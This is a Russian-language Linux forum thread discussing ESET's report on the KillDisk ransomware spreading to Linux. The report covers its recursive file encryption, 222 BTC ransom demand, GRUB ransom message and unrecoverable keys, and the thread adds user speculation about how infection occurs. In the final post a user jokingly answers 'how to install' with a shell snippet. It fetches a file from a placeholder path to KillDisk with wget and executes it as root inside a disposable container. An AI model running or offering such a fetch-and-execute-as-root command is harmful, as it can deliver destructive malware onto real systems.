[NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров

Dmitry Shurupov · Сообщение **Dmitry Shurupov** » 09.01.2017 11:25

Исследователи по ИТ-безопасности из компании ESET опубликовали сообщение о новой версии трояна-вымогателя KillDisk, которая ориентирована на компьютеры, работающие под управлением операционной системы GNU/Linux. Троян KillDisk стал широко известен благодаря своим атакам на украинские компании в конце 2015 года (включая атаку на энергетические компании в декабре, получившую название «BlackEnergy»). В декабре этого года атаки KillDisk продолжились, причём злоумышленники начали использовать дополнительные инструменты (в частности, бэкдор Meterpreter). Недавно же была выявлена новая модификация KillDisk, которая относится к категории троянов-вымогателей: она зашифровывает файлы компьютера, после чего предлагает получить их обратно в обмен на выкуп в объёме 222 BTC (Bitcoins), что составляет около 250 тысяч USD. Заявляется, что последняя версия трояна нацелена на операционные системы Windows и GNU/Linux, поражает десктопы и серверы. В случае Linux-платформы троян KillDisk обходит основные каталоги корневой директории (включая /home, /root, /boot, /etc, /usr и т.д.), делая это рекурсивно с глубиной до 17 подкаталогов. После ребута инфицированная ОС не загружается, а требование о выкупе выводится прямо в меню загрузчика GRUB. Исследователи ESET утверждают, что формально «восстановление зашифрованных файлов невозможно даже в случае уплаты выкупа», объясняя это тем, что «ключи шифрования нигде не сохраняются, после перезагрузки зараженной системы жертва теряет свои данные безвозвратно». Однако одновременно сообщается, что в шифровании, которое используется в Linux, есть уязвимость, которая «делает восстановление возможным, хотя и достаточно сложным». О том, как KillDisk заражает Linux-компьютеры, в сообщении ESET не уточняется. В новости о прошлой модификации вируса (для Windows) заявлялось, что «для заражения компьютеров жертв хакеры используют фишинговые электронные письма с документами Excel, которые содержат вредоносные макросы». Но такой способ вряд ли применим к случаю с Linux-системами.

Stauffenberg · Сообщение **Stauffenberg** » 09.01.2017 12:10

и ни слова о том, как именно подхватить троян, и как он умудряется самостоятельно выполняться в системе от root

azsx · Сообщение **azsx** » 09.01.2017 12:18

Как установить?

s.xbatob · Сообщение **s.xbatob** » 09.01.2017 12:57

azsx писал(а): ↑
09.01.2017 12:18
Как установить?

Как обычно: скачать неизвестно откуда как бы интересную программу и установить от root

ieleja · Сообщение **ieleja** » 09.01.2017 13:29

http://www.welivesecurity.com/2017/01/05/k...m-cant-decrypt/

Stauffenberg · Сообщение **Stauffenberg** » 09.01.2017 14:46

ieleja писал(а): ↑
09.01.2017 13:29
http://www.welivesecurity.com/2017/01/05/k...m-cant-decrypt/

Первый же коммент начинается с

Can you provide more information about how the infection takes place?

Red Gremlin · Сообщение **Red Gremlin** » 09.01.2017 18:36

azsx писал(а): ↑
09.01.2017 12:18
Как установить?

Код: Выделить всё

machinectl clone base test
machinectl start test
systemd-run --machine=test --uid=0 sh 'wget http://<path_to_killdisk> -o bigbadaboom && chmod u+x bigbadaboom && ./bigbadaboom'
cowsay "KillDisk installed!"
machinectl poweroff test
machinectl remove test

unixforum.org

[NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров

[NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров

Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров

Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров

Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров

Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров

Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров

Re: [NIXP] ESET: Троян-вымогатель KillDisk добрался до Linux-компьютеров